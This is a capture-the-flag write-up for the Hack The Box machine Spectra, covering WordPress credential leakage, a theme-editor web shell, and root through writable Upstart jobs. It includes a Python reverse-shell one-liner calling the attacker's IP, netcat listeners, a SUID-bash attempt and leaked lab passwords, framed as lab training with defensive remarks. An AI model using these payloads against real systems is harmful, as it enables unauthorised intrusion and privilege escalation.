Summary

The last old box I had to rehack and create a writeup for due to the lack of documentation. It starts basic: a test site hosting WordPress files includes a wp-config.php.save backup that leaks the database credentials. The same password is reused for the WordPress administrator account, and a theme template edit gives a shell as nginx. An Upstart autologin job reads a cleartext password from a file any local account can read, which gives an SSH session as katie. Sudo is the last step: katie may run initctl as root, so editing an Upstart job her group can write to and then starting it with sudo gives code execution as root.

Enumeration

nmap -p- 10.10.10.229

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql


nmap -p22,80,3306 -sCV 10.10.10.229

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http    nginx 1.17.4
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.17.4
3306/tcp open  mysql   MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)

Port 80

front_page

Has two links, one leading to http://spectra.htb/main/index.php and the other to http://spectra.htb/testing/index.php.

wordpress front page

Simple wordpress site with no posts or activity. Could be useful if I can get credentials.

User as katie

Shell was nginx

testing index php

Odd: /testing/index.php errors out, so this copy of WordPress is configured to talk to the MySQL service but can't authenticate to it (or the install never finished). A half-deployed site is worth a closer look, so I toss a scan at the endpoint to see what else is there.

dirsearch -u http://spectra.htb/testing

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/raccoon/_hacking/HackTheBox/Misc/Spectra/reports/http_spectra.htb/_testing_24-08-16_18-12-35.txt

Target: http://spectra.htb/

[18:12:35] Starting: testing/
[18:13:29] 500 -    3KB - /testing/index.php
[18:13:33] 200 -   19KB - /testing/license.txt
[18:13:52] 200 -    7KB - /testing/readme.html
[18:14:12] 200 -   11KB - /testing/wp-admin/
[18:14:12] 200 -  710B  - /testing/wp-admin/admin-ajax.php
[18:14:12] 500 -    3KB - /testing/wp-config.php
[18:14:12] 301 -  169B  - /testing/wp-admin  ->  http://spectra.htb/testing/wp-admin/
[18:14:12] 500 -    3KB - /testing/wp-admin/install.php
[18:14:12] 200 -    3KB - /testing/wp-config.php.save
[18:14:12] 200 -  627B  - /testing/wp-content/
[18:14:12] 301 -  169B  - /testing/wp-content  ->  http://spectra.htb/testing/wp-content/
[18:14:12] 200 -   69B  - /testing/wp-content/plugins/akismet/akismet.php
[18:14:12] 200 -  167B  - /testing/wp-content/plugins/hello.php
[18:14:12] 500 -    3KB - /testing/wp-admin/setup-config.php
[18:14:13] 301 -  169B  - /testing/wp-includes  ->  http://spectra.htb/testing/wp-includes/
[18:14:13] 200 -  173B  - /testing/wp-includes/rss-functions.php
[18:14:13] 200 -   25KB - /testing/wp-includes/
[18:14:13] 500 -    3KB - /testing/wp-signup.php
[18:14:13] 500 -    3KB - /testing/wp-cron.php
[18:14:13] 500 -    3KB - /testing/wp-login.php
[18:14:13] 200 -    0B  - /testing/xmlrpc.php

Because the WordPress code can't reach its database, every .php page returns a 500, but nginx still serves everything else in the directory as static files. The interesting one is /testing/wp-config.php.save: a .save extension isn't handed to the PHP handler, so nginx returns the file's source as plain text, secrets included. That file is what I have my eyes set on, but I look around regardless.
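As an added example (not part of the original writeup), the two pieces of this step as reusable shell: a list of the editor and backup variants of wp-config.php that a web server will serve as text, and a small extractor for the `define()` constants in a config that was retrieved. The hostname, the suffix list and the sample lines are assumptions; the sample mirrors the three defines that matter above.

```shell
#!/bin/sh
# Added example: hunt for served backup copies of wp-config.php and pull
# DB_* constants out of one. Suffix list and host are assumptions.

# Candidate backup names for a given config URL. .save is the one found
# above; the rest are common editor and sysadmin leftovers.
backup_candidates() {
    base="$1"   # e.g. http://spectra.htb/testing/wp-config.php
    for suffix in .save .bak .old .orig .swp '~' .txt; do
        printf '%s%s\n' "$base" "$suffix"
    done
}

# Print the value of define( 'NAME', 'value' ) from a wp-config read on
# stdin. Only the single-quoted form WordPress ships is handled.
wp_define() {
    name="$1"
    sed -n "s/^define( *'$name', *'\([^']*\)' *);.*/\1/p" | head -n 1
}

# Constructed sample: the lines that matter from the leaked file above.
sample_config() {
    cat <<'EOF'
define( 'DB_NAME', 'dev' );
define( 'DB_USER', 'devtest' );
define( 'DB_PASSWORD', 'devteam01' );
EOF
}

# Against a live target (network; not run here):
#   for u in $(backup_candidates http://spectra.htb/testing/wp-config.php); do
#       curl -s -o /dev/null -w "%{http_code} $u\n" "$u"
#   done
#   curl -s http://spectra.htb/testing/wp-config.php.save | wp_define DB_PASSWORD
```

Any 200 from the candidate loop is a finding on its own; a 500 means the file was handed to PHP, which is what you want to see for the real wp-config.php. On the defensive side the fix is in nginx, not WordPress: deny `wp-config.php*` and the backup extensions outright rather than relying on the PHP location block to cover them.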

wp admin listing

Nothing else here to check, onto the config file:

curl http://spectra.htb/testing/wp-config.php.save
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

...

Credentials for the database. I toss them at WordPress under the username devtest with no result, but administrator:devteam01 does let me into the WordPress admin dashboard: the database password was reused for the admin account. From here the simplest shell is to edit the 404.php template of a theme and navigate to it. I open http://spectra.htb/main/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen and add a PHP cmd payload.

404 upload php cmd

Then navigate to http://spectra.htb/main/wp-content/themes/twentynineteen/404.php?cmd=id

404 php cmd id

For simplicity’s sake I’ll add a pentestmonkey shell so it’s a little more stable than a bash revshell I would otherwise run here. After modifying 404.php head to http://spectra.htb/main/wp-content/themes/twentynineteen/404.php and pop the shell.

nc -nvlp 7777
Listening on 0.0.0.0 7777
Connection received on 10.10.10.229 34802
Linux spectra 5.4.66+ #1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7763 64-Core Processor AuthenticAMD GNU/Linux
 16:46:36 up 46 min,  0 users,  load average: 0.00, 0.00, 0.03
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
bash: cannot set terminal process group (4533): Inappropriate ioctl for device
bash: no job control in this shell
nginx@spectra / $

/etc/autologin

HTB lists the OS as neither Linux nor Windows, so I check what it actually is by reading /etc/lsb-release (if it exists).

nginx@spectra / $ cat /etc/lsb-release
cat /etc/lsb-release
GOOGLE_RELEASE=87.3.41
CHROMEOS_RELEASE_BRANCH_NUMBER=85
CHROMEOS_RELEASE_TRACK=stable-channel
CHROMEOS_RELEASE_KEYSET=devkeys
CHROMEOS_RELEASE_NAME=Chromium OS
CHROMEOS_AUSERVER=https://cloudready-free-update-server-2.neverware.com/update
CHROMEOS_RELEASE_BOARD=chromeover64
CHROMEOS_DEVSERVER=https://cloudready-free-update-server-2.neverware.com/
CHROMEOS_RELEASE_BUILD_NUMBER=13505
CHROMEOS_CANARY_APPID={90F229CE-83E2-4FAF-8479-E368A34938B1}
CHROMEOS_RELEASE_CHROME_MILESTONE=87
CHROMEOS_RELEASE_PATCH_NUMBER=2021_01_15_2352
CHROMEOS_RELEASE_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_BOARD_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_RELEASE_BUILD_TYPE=Developer Build - neverware
CHROMEOS_RELEASE_VERSION=87.3.41
CHROMEOS_RELEASE_DESCRIPTION=87.3.41 (Developer Build - neverware) stable-channel chromeover64

I’m not sure this changes the gameplan here. I’ll continue until an issue potentially relating to running on ChromeOS comes up.

While looking for anything out of the ordinary I find a job config in /opt that auto-logs a user in at boot.

nginx@spectra / $ ls -l /opt
ls -l /opt
total 36
drwxr-xr-x 2 root root 4096 Jun 28  2020 VirtualBox
-rw-r--r-- 1 root root  978 Feb  3  2021 autologin.conf.orig
drwxr-xr-x 2 root root 4096 Jan 15  2021 broadcom
drwxr-xr-x 2 root root 4096 Jan 15  2021 displaylink
drwxr-xr-x 2 root root 4096 Jan 15  2021 eeti
drwxr-xr-x 5 root root 4096 Jan 15  2021 google
drwxr-xr-x 6 root root 4096 Feb  2  2021 neverware
drwxr-xr-x 5 root root 4096 Jan 15  2021 tpm1
drwxr-xr-x 5 root root 4096 Jan 15  2021 tpm2
nginx@spectra / $ cat /opt/autologin.conf.orig
cat /opt/autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter

This is an Upstart job. At boot it reads a cleartext password from /mnt/stateful_partition/etc/autologin/passwd, falling back to /etc/autologin/passwd, and types it into the login prompt with inject-keys.py. Anyone who can read that file has the auto-login account's password, so the next step is to find the installed copy of the job and the password file it reads.
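As an added example (not part of the original writeup or of Chromium OS), the job's lookup order reproduced as shell, plus the permission check a practitioner wants before trusting the file: who else can read it. The directories are passed in as arguments so the check can run against a copy of the layout; the real job hard-codes /mnt/stateful_partition/etc/autologin and /etc/autologin.

```shell
#!/bin/sh
# Added example: mirror the autologin job's search for <dir>/passwd and
# report how widely that file is readable. Directories are parameters.

# Print the first <dir>/passwd that exists, in the order given, as the job
# does; exit non-zero when none is present.
autologin_passwd_file() {
    for dir in "$@"; do
        if [ -e "$dir/passwd" ]; then
            printf '%s\n' "$dir/passwd"
            return 0
        fi
    done
    return 1
}

# Classify a file by its permission bits: "world", "group" or "owner".
# Anything but "owner" means an unrelated local account (nginx here) can
# read the password. Column 8 of ls -l is other-read, column 5 group-read.
passwd_exposure() {
    mode=$(ls -ld "$1" | cut -c1-10)     # e.g. -rw-r--r--
    case "$mode" in
        ???????r??) echo world ;;
        ????r?????) echo group ;;
        *)          echo owner ;;
    esac
}

# The password with the optional trailing newline removed, as the job's
# $(cat ...) would see it.
autologin_password() {
    cat "$1" | tr -d '\n'
}

# On the box (paths are the job's own):
#   f=$(autologin_passwd_file /mnt/stateful_partition/etc/autologin /etc/autologin)
#   passwd_exposure "$f"
```

The job itself is not the bug; storing the password for an interactive account in a file that is not owner-only is. A mode of 0600 owned by root would have stopped the nginx shell at this point.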

find / -name "autologin.conf" 2>/dev/null
/etc/init/autologin.conf
nginx@spectra / $ cat /etc/autologin/passwd
cat /etc/autologin/passwd
SummerHereWeCome!!

The installed job is /etc/init/autologin.conf and the password file is readable from the nginx shell. The password works over SSH as katie:

ssh katie@spectra.htb

The authenticity of host 'spectra.htb (10.10.10.229)' can't be established.
RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'spectra.htb,10.10.10.229' (RSA) to the list of known hosts.
Password: 
katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl
katie@spectra ~ $ cat user.txt
e89d27fe195---------------------

Root

sudo /sbin/initctl

As seen from the sudo -l check, I can run initctl, the Upstart control tool, as root (and SETENV lets me pass environment through). Every job it starts is defined by a .conf file in /etc/init and its script stanza runs as root, so any job file I can write to is a root shell. I first check my groups, then look for job files my group can write.

katie@spectra ~ $ id
uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
katie@spectra ~ $ ls -l /etc/init | grep developers
-rw-rw---- 1 root developers  478 Jun 29  2020 test.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test1.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test10.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test2.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test3.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test4.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test5.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test6.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test7.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test8.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test9.conf
katie@spectra ~ $ 
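As an added example (not the writeup's own commands), the same enumeration as shell functions, with the job directory passed in so it can be run against a copy. It tests the permission bits rather than `-writable`, so the answer is the same whether it is run as katie or as root when auditing, and it checks which of those jobs carry a `script` stanza, the part that runs arbitrary shell as root.

```shell
#!/bin/sh
# Added example: find Upstart job files a non-root user can modify, which
# is exactly what turns `sudo initctl start <job>` into a root shell.
# The job directory is a parameter (normally /etc/init).

# Jobs whose mode has the group- or world-write bit set, printed by job
# name (the argument initctl takes) rather than by path.
writable_jobs() {
    find "$1" -maxdepth 1 -name '*.conf' \( -perm -020 -o -perm -002 \) \
        | sed 's#.*/##; s#\.conf$##' | sort
}

# Of those, the ones the current user can actually open for writing
# (owner, matching group, or world bit).
jobs_i_can_edit() {
    for job in $(writable_jobs "$1"); do
        [ -w "$1/$job.conf" ] && printf '%s\n' "$job"
    done
    return 0
}

# Does a job file have a "script" stanza, i.e. shell run as root on start?
job_has_script() {
    grep -q '^script' "$1"
}

# On the box:
#   id -nG                      # confirms the developers group
#   jobs_i_can_edit /etc/init   # test, test1 ... test10
#   job_has_script /etc/init/test.conf && echo "shell as root on start"
```

Group-writable files in /etc/init are the finding; the sudo rule only makes it cheap to trigger. Note that the job files here are 660 root:developers, so the check is on the group bit, not on world access.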

Simple enough: I'll add a copy of /bin/bash with the SUID bit set to the script stanza of test.conf, then start the job and get root.

katie@spectra ~ $ nano /etc/init/test.conf
Error in /usr/local/etc/nanorc on line 260: Error expanding /usr/share/nano/*.nanorc: No such file or directory
katie@spectra ~ $ cat /etc/init/test.conf
description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown

script

    cp /bin/bash /tmp/bash
    chmod u+s /tmp/bash
    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script

pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script

pre-stop script
    rm /var/run/nodetest.pid
    echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log
end script
katie@spectra ~ $ sudo /sbin/initctl start test
test start/running, process 5777
katie@spectra ~ $ ls /tmp
bash                                   disk-post-startup            uptime-lockbox-cache-start
disk-boot-complete                     disk-pre-startup             uptime-login-prompt-visible
disk-chrome-exec                       disk-shill-start             uptime-network-ethernet-configuration
disk-chrome-main                       disk-ui-post-stop            uptime-network-ethernet-no-connectivity
disk-cryptohome-unmounted              f                            uptime-network-ethernet-ready
disk-lockbox-cache-end                 firmware-boot-time           uptime-network-ethernet-registered
disk-lockbox-cache-start               mysql.sock                   uptime-other-processes-terminated
disk-login-prompt-visible              mysql.sock.lock              uptime-post-startup
disk-network-ethernet-configuration    uptime-boot-complete         uptime-pre-startup
disk-network-ethernet-no-connectivity  uptime-chrome-exec           uptime-shill-start
disk-network-ethernet-ready            uptime-chrome-main           uptime-ui-post-stop
disk-network-ethernet-registered       uptime-cryptohome-unmounted
disk-other-processes-terminated        uptime-lockbox-cache-end
katie@spectra ~ $ /tmp/bash -p
-bash: /tmp/bash: Permission denied
katie@spectra ~ $ 

That is unexpected: the copy is there, owned by root with the SUID bit, yet it won't execute. Permission denied on a file you can read and that has the exec bit is what a noexec mount looks like, and Chrome OS mounts /tmp that way (mount | grep ' /tmp ' would confirm it). Oh well, a simple python reverse shell run from the job gives a root shell directly. Be sure to stop the job before editing the file, since start does nothing for a job that is already running.

katie@spectra ~ $ sudo /sbin/initctl stop test
test stop/waiting
katie@spectra ~ $ nano /etc/init/test.conf
Error in /usr/local/etc/nanorc on line 260: Error expanding /usr/share/nano/*.nanorc: No such file or directory
katie@spectra ~ $ cat /etc/init/test.conf
description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown

script

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script

pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script

pre-stop script
    rm /var/run/nodetest.pid
    echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log
end script
katie@spectra ~ $ sudo /sbin/initctl start test
test start/running, process 5908

nc -nvlp 7777
Listening on 0.0.0.0 7777
Connection received on 10.10.10.229 34810
spectra / # id
id
uid=0(root) gid=0(root) groups=0(root)
spectra / # cat /root/root.txt
cat /root/root.txt
d44519713b88--------------------